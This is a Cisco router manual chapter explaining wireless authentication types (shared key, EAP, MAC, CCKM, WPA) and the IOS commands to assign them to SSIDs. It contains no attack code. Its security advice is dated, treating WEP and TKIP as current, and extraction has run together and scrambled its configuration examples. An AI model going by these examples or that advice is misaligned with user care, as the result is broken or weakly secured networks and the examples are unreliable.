Cisco Router 860, 880 Series User Manual

							      Authentication Types for Wireless Devices
Understanding Authentication Types
3
Authentication Types for Wireless Devices
OL-15914-01
Both the unencrypted challenge and the encrypted challenge can be monitored, however, which leaves 
the access point open to attack from an intruder who calculates the WEP key by comparing the 
unencrypted and encrypted text strings. Because of this weakness, shared key authentication can be less 
secure than open authentication. Like open authentication, shared key authentication does not rely on a 
RADIUS server on your network.
Figure 2 shows the authentication sequence between a device trying to authenticate and an access point 
using shared key authentication. In this example the device’s WEP key matches the access point’s key, 
so it can authenticate and communicate.
Figure 2 Sequence for Shared Key Authentication
EAP Authentication to the Network
This authentication type provides the highest level of security for your wireless network. By using the 
Extensible Authentication Protocol (EAP) to interact with an EAP-compatible RADIUS server, the 
access point helps a wireless client device and the RADIUS server to perform mutual authentication and 
derive a dynamic unicast WEP key. The RADIUS server sends the WEP key to the access point, which 
uses it for all unicast data signals that it sends to or receives from the client. The access point also 
encrypts its broadcast WEP key (entered in the access point’s WEP key slot 1) with the client’s unicast 
key and sends it to the client. 
When you enable EAP on your access points and client devices, authentication to the network occurs in 
the sequence shown in 
Figure 3:
Access point
or bridgeWired LAN
Client
deviceServer
1. Authentication request
2. Unencrypted challenge text
3. Encrypted challenge text
4. Authentication success
231083 
						

							      Authentication Types for Wireless Devices
Understanding Authentication Types
4
Authentication Types for Wireless Devices
OL-15914-01
Figure 3 Sequence for EAP Authentication
In Steps 1 through 9 in Figure 3, a wireless client device and a RADIUS server on the wired LAN use 
802.1x and EAP to perform a mutual authentication through the access point. The RADIUS server sends 
an authentication challenge to the client. The client uses a one-way encryption of the user-supplied 
password to generate a response to the challenge and sends that response to the RADIUS server. Using 
information from its user database, the RADIUS server creates its own response and compares that to 
the response from the client. When the RADIUS server authenticates the client, the process repeats in 
reverse, and the client authenticates the RADIUS server.
When mutual authentication is complete, the RADIUS server and the client determine a WEP key that 
is unique to the client and provides the client with the appropriate level of network access, thereby 
approximating the level of security in a wired switched segment to an individual desktop. The client 
loads this key and prepares to use it for the logon session. 
During the logon session, the RADIUS server encrypts and sends the WEP key, called a session key, over 
the wired LAN to the access point. The access point encrypts its broadcast key with the session key and 
sends the encrypted broadcast key to the client, which uses the session key to decrypt it. The client and 
access point activate WEP and use the session and broadcast WEP keys for all communications during 
the remainder of the session.
There is more than one type of EAP authentication, but the access point behaves the same way for each 
type: it relays authentication messages from the wireless client device to the RADIUS server and from 
the RADIUS server to the wireless client device. See the 
“Assigning Authentication Types to an SSID” 
section on page 9 for instructions on setting up EAP on the access point.
NoteIf you use EAP authentication, you can select open or shared key authentication, but you don’t have to. 
EAP authentication controls authentication both to your access point and to your network. 
Access point
or bridgeWired LAN
Client
deviceRADIUS Server
1. Authentication request
2. Identity request
3. Username
(relay to client)(relay to server)
4. Authentication challenge
5. Authentication response
(relay to client)(relay to server)
6. Authentication success
7. Authentication challenge
(relay to client)(relay to server)
8. Authentication response
9. Successful authentication(relay to server)65583 
						

							      Authentication Types for Wireless Devices
Understanding Authentication Types
5
Authentication Types for Wireless Devices
OL-15914-01
MAC Address Authentication to the Network
The access point relays the wireless client device’s MAC address to a RADIUS server on your network, 
and the server checks the address against a list of allowed MAC addresses. Intruders can create 
counterfeit MAC addresses, so MAC-based authentication is less secure than EAP authentication. 
However, MAC-based authentication provides an alternate authentication method for client devices that 
do not have EAP capability. See the 
“Assigning Authentication Types to an SSID” section on page 9 for 
instructions on enabling MAC-based authentication.
TipIf you don’t have a RADIUS server on your network, you can create a list of allowed MAC addresses on 
the access point’s Advanced Security: MAC Address Authentication page. Devices with MAC addresses 
not on the list are not allowed to authenticate. 
TipIf MAC-authenticated clients on your wireless LAN roam frequently, you can enable a MAC 
authentication cache on your access points. MAC authentication caching reduces overhead because the 
access point authenticates devices in its MAC-address cache without sending the request to your 
authentication server. See the 
“Configuring MAC Authentication Caching” section on page 14 for 
instructions on enabling this feature.
Figure 4 shows the authentication sequence for MAC-based authentication.
Figure 4 Sequence for MAC-Based Authentication
Access point
or bridgeWired LAN
Client
deviceServer
1. Authentication request
2. Authentication success
3. Association request
4. Association response
(block traffic from client)
5. Authentication request
6. Success
7. Access point or bridge unblocks
traffic from client
65584 
						

							      Authentication Types for Wireless Devices
Understanding Authentication Types
6
Authentication Types for Wireless Devices
OL-15914-01
Combining MAC-Based, EAP, and Open Authentication
You can set up the access point to authenticate client devices using a combination of MAC-based and 
EAP authentication. When you enable this feature, client devices that associate to the access point using 
802.11 open authentication first attempt MAC authentication; if MAC authentication succeeds, the client 
device joins the network. 
If MAC authentication fails, EAP authentication takes place. See the “Assigning Authentication Types 
to an SSID” section on page 9 for instructions on setting up this combination of authentications.
Using CCKM for Authenticated Clients
Using Cisco Centralized Key Management (CCKM), authenticated client devices can roam from one 
access point to another without any perceptible delay during reassociation. An access point on your 
network provides Wireless Domain Services (WDS) and creates a cache of security credentials for 
CCKM-enabled client devices on the subnet. 
The WDS access point’s cache of credentials dramatically reduces the time required for reassociation 
when a CCKM-enabled client device roams to a new access point. When a client device roams, the WDS 
access point forwards the client’s security credentials to the new access point, and the reassociation 
process is reduced to a two-packet exchange between the roaming client and the new access point. 
Roaming clients reassociate so quickly that there is no perceptible delay in voice or other time-sensitive 
applications. See the 
“Assigning Authentication Types to an SSID” section on page 9 for instructions on 
enabling CCKM on your access point. The RADIUS-assigned VLAN feature is not supported for client 
devices that associate using SSIDs with CCKM enabled. 
Figure 5 shows the reassociation process using CCKM. 
Figure 5 Client Reassociation Using CCKM
88964Reassociation request
Reassociation responsePre-registration request
Pre-registration reply Roaming client
deviceAccess point
WDS Device - Router/
Switch/APAuthentication server Wired LAN 
						

							      Authentication Types for Wireless Devices
Understanding Authentication Types
7
Authentication Types for Wireless Devices
OL-15914-01
Using WPA Key Management
Wi-Fi Protected Access is a standards-based, interoperable security enhancement that strongly increases 
the level of data protection and access control for existing and future wireless LAN systems. It is derived 
from and will be forward-compatible with the upcoming IEEE 802.11i standard. WPA leverages TKIP 
(Temporal Key Integrity Protocol) for data protection and 802.1X for authenticated key management.
WPA key management supports two mutually exclusive management types: WPA and WPA-Pre-shared 
key (WPA-PSK). Using WPA key management, clients and the authentication server authenticate to each 
other using an EAP authentication method, and the client and server generate a pairwise master key 
(PMK). Using WPA, the server generates the PMK dynamically and passes it to the access point. Using 
WPA-PSK, however, you configure a pre-shared key on both the client and the access point, and that 
pre-shared key is used as the PMK.
NoteUnicast and multicast cipher suites advertised in WPA information element (and negotiated during 
802.11 association) may potentially mismatch with the cipher suite supported in an explicitly assigned 
VLAN. If the RADIUS server assigns a new vlan ID which uses a different cipher suite from the 
previously negotiated cipher suite, there is no way for the access point and client to switch back to the 
new cipher suite. Currently, the WPA and CCKM protocols does not allow the cipher suite to be changed 
after the initial 802.11 cipher negotiation phase. In this scenario, the client device is disassociated from 
the wireless LAN. 
See the “Assigning Authentication Types to an SSID” section on page 9 for instructions on configuring 
WPA key management on your access point. 
Figure 6 shows the WPA key management process. 
						

							      Authentication Types for Wireless Devices
Configuring Authentication Types
8
Authentication Types for Wireless Devices
OL-15914-01
Figure 6 WPA Key Management Process
Configuring Authentication Types
This section describes how to configure authentication types. You attach configuration types to the 
SSIDs. See 
Service Set Identifier (SSID) for details on setting up multiple SSIDs. This section contains 
these topics:
 Assigning Authentication Types to an SSID, page 9
 Configuring Authentication Holdoffs, Timeouts, and Intervals, page 15
 Creating and Applying EAP Method Profiles for the 802.1X Supplicant, page 18
NoteThere are no default authentication SSIDs for the wireless router.
88965
Client and server authenticate to each other, generating an EAP master key Client deviceAccess point
Authentication
server Wired LAN
Server uses the EAP master key to
generate a pairwise master key (PMK)
to protect communication between the
client and the access point. (However,
if the client is using 802.1x authentication
and both the access point and the client
are configured with the same pre-shared key,
the pre-shared key is used as the PMK and
the server does not generate a PMK.)
Client and access point complete
a four-way handshake to:
Client and access point complete
a two-way handshake to securely
deliver the group transient key from
the access point to the client.Confirm that a PMK exists and that
knowledge of the PMK is current.
Derive a pairwise transient key from
the PMK.
Install encryption and integrity keys into
the encryption/integrity engine, if necessary.
Confirm installation of all keys. 
						

							      Authentication Types for Wireless Devices
Configuring Authentication Types
9
Authentication Types for Wireless Devices
OL-15914-01
Assigning Authentication Types to an SSID
To configure authentication types for SSIDs, follow these steps, beginning in privileged EXEC mode:
CommandPurpose
Step 1configure terminalEnters global configuration mode.
Step 2dot11 ssid ssid-stringCreates an SSID and enter SSID configuration mode for the 
new SSID. The SSID can consist of up to 32 alphanumeric 
characters. SSIDs are case sensitive.
The SSID can consist of up to 32 alphanumeric, case-sensitive, 
characters. 
The first character cannot contain the following characters:
 Exclamation point (!)
 Pound sign (#)
 Semicolon (;)
The following characters are invalid and cannot be used in an 
SSID:
 Plus sign (+)
 Right bracket (])
 Front slash (/)
 Quotation mark ()
 Ta b
 Trailing spaces 
						

							      Authentication Types for Wireless Devices
Configuring Authentication Types
10
Authentication Types for Wireless Devices
OL-15914-01
Step 3authentication open  
[mac-address list-name [alternate]] 
[[optional] eap list-name]
(Optional) Sets the authentication type to open for this SSID. 
Open authentication allows any device to authenticate and then 
attempt to communicate with the access point. 
 (Optional) Set the SSID’s authentication type to open with 
MAC address authentication. The access point forces all 
client devices to perform MAC-address authentication 
before they are allowed to join the network. For list-name, 
specify the authentication method list. Click this link for 
more information on method lists: 
http://www.cisco.com/univercd/cc/td/doc/product/softwar
e/ios122/122cgcr/fsecur_c/fsaaa/scfathen.htm#xtocid2
Use the alternate keyword to allow client devices to join 
the network using either MAC or EAP authentication; 
clients that successfully complete either authentication are 
allowed to join the network.
 (Optional) Set the SSID’s authentication type to open with 
EAP authentication. The access point forces all client 
devices to perform EAP authentication before they are 
allowed to join the network. For list-name, specify the 
authentication method list. 
Use the optional keyword to allow client devices using 
either open or EAP authentication to associate and become 
authenticated. This setting is used mainly by service 
providers that require special client accessibility.
NoteAn access point configured for EAP authentication 
forces all client devices that associate to perform EAP 
authentication. Client devices that do not use EAP 
cannot use the access point.
Step 4authentication shared 
[mac-address list-name] 
[eap list-name]
(Optional) Sets the authentication type for the SSID to shared 
key.
NoteBecause of shared key’s security flaws, Cisco 
recommends that you avoid using it.
NoteYou can assign shared key authentication to only one 
SSID.
 (Optional) Set the SSID’s authentication type to shared key 
with MAC address authentication. For list-name, specify 
the authentication method list. 
 (Optional) Set the SSID’s authentication type to shared key 
with EAP authentication. For list-name, specify the 
authentication method list.
Command Purpose 
						

							      Authentication Types for Wireless Devices
Configuring Authentication Types
11
Authentication Types for Wireless Devices
OL-15914-01
Use the no form of the SSID commands to disable the SSID or to disable SSID features.
Step 5authentication network-eap 
list-name
 
[mac-address list-name]
(Optional) Sets the authentication type for the SSID to 
Network-EAP. Using the Extensible Authentication Protocol 
(EAP) to interact with an EAP-compatible RADIUS server, the 
access point helps a wireless client device and the RADIUS 
server to perform mutual authentication and derive a dynamic 
unicast WEP key. However, the access point does not force all 
client devices to perform EAP authentication. 
 (Optional) Set the SSID’s authentication type to 
Network-EAP with MAC address authentication. All client 
devices that associate to the access point are required to 
perform MAC-address authentication. For list-name, 
specify the authentication method list. 
Step 6authentication key-management 
{
 [wpa] [cckm] } [ optional ]
(Optional) Sets the authentication type for the SSID to WPA, 
CCKM, or both. If you use the optional keyword, client 
devices other than WPA and CCKM clients can use this SSID. 
If you do not use the optional keyword, only WPA or CCKM 
client devices are allowed to use the SSID.
To enable CCKM for an SSID, you must also enable 
Network-EAP authentication. When CCKM and Network EAP 
are enabled for an SSID, client devices using LEAP, 
EAP-FAST, PEAP/GTC, MSPEAP, EAP-TLS, and EAP-FAST 
can authenticate using the SSID.
To enable WPA for an SSID, you must also enable Open 
authentication or Network-EAP or both.
NoteWhen you enable both WPA and CCKM for an SSID, 
you must enter wpa first and cckm second. Any WPA 
client can attempt to authenticate, but only CCKM 
voice clients can attempt to authenticate. 
NoteBefore you can enable CCKM or WPA, you must set 
the encryption mode for the SSID’s VLAN to one of the 
cipher suite options. To enable both CCKM and WPA, 
you must set the encryption mode to a cipher suite that 
includes TKIP. See 
Cipher Suites and WEP for 
instructions on configuring the VLAN encryption 
mode.
NoteIf you enable WPA for an SSID without a pre-shared 
key, the key management type is WPA. If you enable 
WPA with a pre-shared key, the key management type 
is WPA-PSK. See the 
“Configuring Additional WPA 
Settings” section on page 13 for instructions on 
configuring a pre-shared key.
Step 7endReturns to privileged EXEC mode.
Step 8copy running-config startup-config(Optional) Saves your entries in the configuration file.
Command Purpose 
						

							      Authentication Types for Wireless Devices
Configuring Authentication Types
12
Authentication Types for Wireless Devices
OL-15914-01
This example sets the authentication type for the SSID batman to Network-EAP with CCKM 
authenticated key management. Client devices using the SSID batman authenticate using the adam 
server list. After they are authenticated, CCKM-enabled clients can perform fast reassociations using 
CCKM.
ap1200# configure terminal
ap1200(config-if)# ssid batmanap1200(config-ssid)# authentication network-eap adam
ap1200(config-ssid)# authentication key-management cckm optional
ap1200(config)# interface dot11radio 0ap1200(config-if)# ssid batman
ap1200(config-ssid)# end
Configuring WPA Migration Mode
WPA migration mode allows these client device types to use the same SSIS to associate to the access 
point:
 WPA clients capable of TKIP and authenticated key management
 802.1X-2001 clients (such as legacy LEAP clients and clients using TLS) capable of authenticated 
key management but not TKIP
 Static-WEP clients not capable of TKIP or authenticated key management
If all three client types associate using the same SSID, the multicast cipher suite for the SSID must be 
WEP. If only the first two types of clients use the same SSID, the multicast key can be dynamic, but if 
the static-WEP clients use the SSID, the key must be static. To accommodate associated client devices, 
the access point can switch automatically between a static group key and a dynamic group key. To 
support all three types of clients on the same SSID, you must configure the static key in key slot 2 or 3.
To set up an SSID for WPA migration mode, configure these settings:
 WPA optional
 A cipher suite containing TKIP and 40-bit or 128-bit WEP
 A static WEP key in key slot 2 or 3
This example sets the SSID migrate for WPA migration mode:
ap1200# configure terminalap1200(config-if)# ssid migrate
ap1200(config-if)# encryption mode cipher tkip wep128
ap1200(config-if)# encryption key 3 size 128 12345678901234567890123456 transmit-keyap1200(config-ssid)# authentication open
ap1200(config-ssid)# authentication network-eap adam
ap1200(config-ssid)# authentication key-management wpa optionalap1200(config-ssid)# wpa-psk ascii batmobile65
ap1200(config)# interface dot11radio 0
ap1200(config-if)# ssid migrateap1200(config-ssid)# end